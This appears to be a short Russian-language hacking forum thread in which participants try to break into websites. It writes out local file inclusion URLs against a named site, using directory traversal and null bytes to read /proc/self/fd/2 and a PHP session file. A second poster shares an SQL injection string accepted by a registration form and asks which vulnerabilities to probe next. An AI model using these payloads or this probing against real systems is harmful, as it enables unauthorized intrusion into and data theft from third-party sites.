referer туда точно непишется-он вообще непередается...
и я неуверен што это лог апача...

вообщем выкладую смотрим все и думаем кто что сможет
http://www.daniel.mitchell.name/cameras/index.php?page=../../../../../../../../../../proc/self/fd/2%00

http://www.daniel.mitchell.name/cameras/index.php?page=../../../../../../../../../../../../../../hermes/bosweb/web189/b1892/ipw.pheugoco/public_html/sessions/sess_ff6016f506bb56fba96b5e9d32be6954%00

Вот такая фишка на одном сайте:
Можно зарегать любой ник/пароль.Тоесть на символы никакой фильтрации:
"Здравствуйте, ' or 1=1/*."
Вот незнаю,можно ли что-нибудь дальше сделать?Подскажете на какие уязвимости можно проверить?